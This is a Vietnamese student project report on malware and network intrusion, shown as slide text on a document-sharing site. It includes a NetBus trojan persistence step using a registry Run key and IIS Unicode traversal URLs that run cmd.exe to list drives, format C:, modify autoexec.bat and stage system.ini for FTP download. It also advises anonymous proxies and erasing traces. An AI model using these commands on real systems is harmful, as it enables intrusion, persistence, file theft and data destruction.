Tìm hiểu một số phần mềm phá hoại và các giải pháp xâm nhập mạng riêng
lượt xem 63
download
Phần lớn các cuộc tấn công trên mạng được thực hiện thông qua việc sử dụng một hoặc nhiều công cụ phần mềm. Những kẻ viết virus có thể gia tăng khả năng điều khiển lên virus của mình sau khi đã phát tán chúng trên mạng
Bình luận(0) Đăng nhập để gửi bình luận!
Nội dung Text: Tìm hiểu một số phần mềm phá hoại và các giải pháp xâm nhập mạng riêng
- BÁO CÁO ĐỒ ÁN BỘ GIÁO DỤC VÀ ĐÀO TẠO TRƯỜNG ĐH DLHP NGÀNH CÔNG NGHỆ THÔNG TIN Đề tài: TÌM HIỂU MỘT SỐ PHẦN MỀM PHÁ HOẠI & CÁC GIẢI PHÁP XÂM NHẬP MẠNG DÙNG RIÊNG CÓ KẾT NỐI INTERNET Giáo viên hƣớng dẫn: TS. Hồ Văn Canh : Vũ Thị Thu Hằng Sinh viên Lớp : CT702 1
- NỘI DUNG CHÍNH Chƣơng 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CÔNG TRÊN MẠNG MÁY TÍNH 2
- Chương 1: MỘT SỐ PHƢƠNG PHÁP TẤN CÔNG VÀ KỸ THUẬT XÂM NHẬP MẠNG Thực trạng tấn công của tội phạm trên mạng Các phƣơng pháp tấn công Các kỹ thuật xâm nhập mạng 3
- Thực trạng tấn công của tội phạm trên mạng Phần lớn các cuộc tấn công trên mạng đƣợc thực hiện thông qua việc sử dụng một hoặc nhiều công cụ phần mềm. Phần mềm phá hoại Các vụ tấn công trên mạng ngày càng gia tăng cả về quy mô và tính chất nguy hiểm. Những kẻ viết virus có thể gia tăng khả năng điều khiển lên virus của mình sau khi đã phát tán chúng trên mạng. 4
- Các phƣơng pháp tấn công Tấn công trực tiếp Nghe trộm Giả mạo địa chỉ Vô hiệu hoá các chức năng của hệ thống mục tiêu Sử dụng lỗi của ngƣời quản trị hệ thống 5
- Các kỹ thuật xâm nhập mạng Rình mò (Snooping) Đánh lừa (Spoofing) Điệp viên (Agent) 6
- Chƣơng 2: MỘT SỐ NGUYÊN TẮC TẤN CÔNG TRÊN MẠNG Phát hiện điểm yếu trong cơ chế bảo mật của đối phƣơng Triệt để lợi dụng cửa sau để tấn công Tận dụng các công cụ sẵn có Khai thác tối đa điểm yếu của mục tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ Nguyên tắc an toàn Nguyên tắc phối hợp tấn công 7
- Phát hiện điểm yếu trong cơ chế bảo mật của đối phƣơng Một hệ thống đảm bảo ANAT máy tính gồm : Yếu tố tổ chức. Yếu tố kỹ thuật, công nghệ. Có hai hƣớng tiếp cận để tìm các lỗ hổng bảo mật: Từ góc độ chiến thuật Từ góc độ kỹ thuật. Một số diễn đàn trao đổi về lỗi bảo mật: http://packetstorm.secuify, http://www.tlsecurity.net, http://www.hackerVN.net 8
- Triệt để lợi dụng cửa sau để tấn công Việc đột nhập vào một hệ thống máy tính nào đó nói chung là rất khó khăn, vì thế sau khi đột nhập ngƣời ta muốn để lại một công cụ nào đó giúp dễ dàng xâm nhập trong những lần sau. Backdoor / Trojan. Nguyên tắc hoạt động của Backdoor Máy Máy Giao tiếp bình thƣờng tấn đích công Giao tiếp cửa sau Back Back 9 Hình 3.1.1:Mô hình hoạt động của backdoor
- Tận dụng các công cụ sẵn có Sử dụng các công cụ để cấy Trojan lên một máy khác thông qua chia sẻ tài nguyên trên máy đó: Công cụ bẻ khóa chia sẻ Passware Kit (http://www.LostPassword.com). Copy file server của Netbus 1.7 (patch.exe) vào thƣ mục bất kỳ ở ổ C: Sử dụng regedit.exe của Windows để nạp và sửa đổi Registry máy đó (Remote Registry Service) 10
- Tận dụng các công cụ sẵn có Thêm vào đó một khóa ở HKEY_CURRENT_USER\Software\Microsoft\Wi ndows\Current\Version\Run hoặc HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\Current\Version\Run để chạy patch.exe: Value type: String Value name: Patch Value data C:\windows\patch.exe 11
- Khai thác tối đa điểm yếu của mục tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ Phƣơng pháp tấn công IIS server bằng cách lợi dụng lỗi Unicode “dot dot directory traversal attack” (tấn công bằng cách lần ngƣợc thƣ mục do lỗi “dot dot”). http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste m32/cmd.exe?/c+dir+c:\ Thay xâu con “../”, “..\” bởi xâu unicode chứa một đoạn mã hóa rất dài của ký tự “/” “\” nhƣ “%c1%1c”, “..c0%f9”… 12
- Khai thác tối đa điểm yếu của mục tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ Khi thực thi, xâu “%c1%1c” đƣợc dịch trở lại nguyên dạng ký tự “/”. http://www.iisaffected.com/scripts/../../winnt/system32/cm d.exe?/c+dir+c:\ Để xem nội dung file autoexec.bat: http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste m32/cmd.exe?/c+type+c:\autoexec .bat Để format lại ổ đĩa C: http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste m32/cmd.exe?/c+format+c:\+/q 13
- Khai thác tối đa điểm yếu của mục tiêu tấn công, đặc biệt các lỗ hổng bảo mật của hệ thống và các dịch vụ Cũng có thể chiếm quyền ghi đĩa và thực hiện sửa đổi, tạo mới file trên server: + Bƣớc 1: Tạo một bản sao mới cmd1.exe của trình thông dịch lệnh DOS: http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste m32/cmd.exe?/c+copy+c:\winnt/system32/cmd.exe+c/win nt/system32/cmd1.exe + Bƣớc 2: Ghi thêm một số lệnh vào file autoexec.bat: http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste m32/cmd.exe?/c+echo+>>+c:\autoexec.bat+@echo+Hihi 14
- Nguyên tắc an toàn Sử dụng các procxy vô danh (Anonymous Proxy Server). Gửi yêu cầu Máy của ta Máy đối Gửi yêu cầu Proxy phƣơng Trả lời Trả lời Hình 3.5.1: Mô hình giao tiếp giữa hai máy thông qua proxy. Để luôn có những thông tin về các proxy miễn phí, có thể thƣờng xuyên truy cập các trang web http://www.blackcode.com, http://www.freeproxies.com. Sử dụng một số chƣơng trình nhằm tạo ra các proxy ảo ngay trên máy của mình, nhƣ Anomity 4 proxy. 15
- Nguyên tắc phối hợp tấn công Ngụy trang Khám phá điểm yếu, lỗ hổng bảo mật trong hệ thống mục tiêu Sử dụng các công cụ để khai thác các điểm yếu của hệ thống mục tiêu Tiến hành các biện pháp tấn công, thu thập thông tin Tạo đƣờng ngầm (cửa sau), cài cắm “điệp viên” nếu có thể Xóa dấu vết Hình 3.6.1: Sơ đồ thứ tự áp dụng các nguyên lý tấn công 16
- Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU NETBUS 17
- Chƣơng 3: PHÂN TÍCH MỘT SỐ PHẦN MỀM MẪU WS_Ping ProPack (http://www.ipswitch.com) 18
- Chƣơng 4: MỘT SỐ GIẢI PHÁP CỤ THỂ TẤN CÔNG TRÊN MẠNG MÁY TÍNH Tấn công máy mục tiêu bằng cách giành quyền điều khiển hệ thống đó. HTTP (HypeTtext Transfer Protocol – giao thức truyền siêu văn bản) Giao thức TFTP (Trivial File Transfer Protocol – giao thức truyền file đơn giản) Giao thức NetBIOS (Network Basic Input/Output System) Kết hợp công cụ quét tài nguyên đƣợc chia sẻ và công cụ bẻ mật khẩu 19
- Cách download và upload file trên IIS mắc lỗi Unicode Khi cài IIS phiên bản từ 4.0 trở lên, FTP server cho phép user truy cập vào thƣ mục \inetpub\ftoproot\ và download các file từ đó: + Bƣớc 1: Copy file download (giả sử là file c:\system.ini) vào thƣ mục \inetpub\ftoproot\ bằng URL: http://www.iisaffected.com/scripts/..%c1%1c../winnt/syste m32/cmd.exe?/c+copy+c:\system.ini+c:\inetpub\ftoproot\ + Bƣớc 2: Sử dụng FTP vô danh đăng nhập vào máy tính đích download file system.ini về. 20
CÓ THỂ BẠN MUỐN DOWNLOAD
-
Báo cáo đồ án tốt nghiệp: Phần mềm quản lý kho sách
84 p | 1011 | 119
-
LUẬN VĂN:TÌM HIỂU CÁC HƯỚNG TIẾP CẬN BÀI TOÁN PHÂN LOẠI VĂN BẢN VÀ XÂY DỰNG PHẦN MỀM PHÂN LOẠI TIN TỨC BÁO ĐIỆN TỬ
132 p | 355 | 92
-
Luận văn: Một số dạng “tấn công“ hệ thống thông tin và phòng tránh bằng xử lý các “lỗ hổng“ thiếu an ninh
76 p | 196 | 70
-
Đồ án cơ sở chuyên ngành phần mềm: Quản lý sinh viên bằng cây nhị phân
52 p | 391 | 64
-
Luận văn: Tìm hiểu một số kỹ thuật đồ họa 3D và ứng dụng
61 p | 191 | 41
-
Luận văn: Tìm hiểu phương pháp nâng cao chất lượng ảnh y học
43 p | 106 | 24
-
Báo cáo khoa học: Tìm hiểu phần mềm violet và ứng dụng của nó trong việc xây dựng một số bài giảng môn Tin học 11
23 p | 172 | 22
-
Khóa luận tốt nghiệp Công nghệ kỹ thuật cơ điện tử: Tìm hiểu sử dụng phần mềm mô phỏng mạch điện tử MULTISIM
46 p | 63 | 17
-
Luận văn:TÌM HIỂU MỘT SỐ PHƢƠNG PHÁP TRÍCH CHỌN ĐẶC TRƢNG VÀ ỨNG DỤNG CHO TRA CỨU ẢNH THEO NỘI DUNG
54 p | 92 | 17
-
Luận văn:Tìm hiểu một số kỹ thuật khảm ảnh
62 p | 68 | 15
-
Khóa luận Cử nhân Tin học: Tìm hiểu qui trình phầm mềm PSP
191 p | 100 | 11
-
Khóa luận tốt nghiệp: Tìm hiểu ứng dụng phần mềm quản trị thư viện ILib tại Trung tâm Thông tin - Thư viện trường Đại học Ngoại thương Hà Nội
67 p | 44 | 9
-
Báo cáo khoa học và công nghệ cấp cơ sở: Một số giải pháp đảm bảo an toàn cho phần mềm hệ thống thông tin của doanh nghiệp
64 p | 57 | 6
-
Khóa luận tốt nghiệp: Tìm hiểu việc ứng dụng phần mềm Libol trong Thư viện trường Đại học Thủy lợi
69 p | 28 | 6
-
Tóm tắt Luận văn Thạc sĩ: Nghiên cứu một số phương pháp phân tích dữ liệu trên bảng quyết định trong hệ thống dữ liệu lớn
17 p | 37 | 4
-
Luận văn Thạc sĩ: Nghiên cứu một số kỹ thuật tính toán va chạm trong thực tại ảo
60 p | 16 | 4
-
Tóm tắt Khóa luận tốt nghiệp khoa Thư viện - thông tin: Tìm hiểu phần mềm nguồn mở Greenstone và tình hình ứng dụng tại Việt Nam
11 p | 60 | 2
Chịu trách nhiệm nội dung:
Nguyễn Công Hà - Giám đốc Công ty TNHH TÀI LIỆU TRỰC TUYẾN VI NA
LIÊN HỆ
Địa chỉ: P402, 54A Nơ Trang Long, Phường 14, Q.Bình Thạnh, TP.HCM
Hotline: 093 303 0098
Email: support@tailieu.vn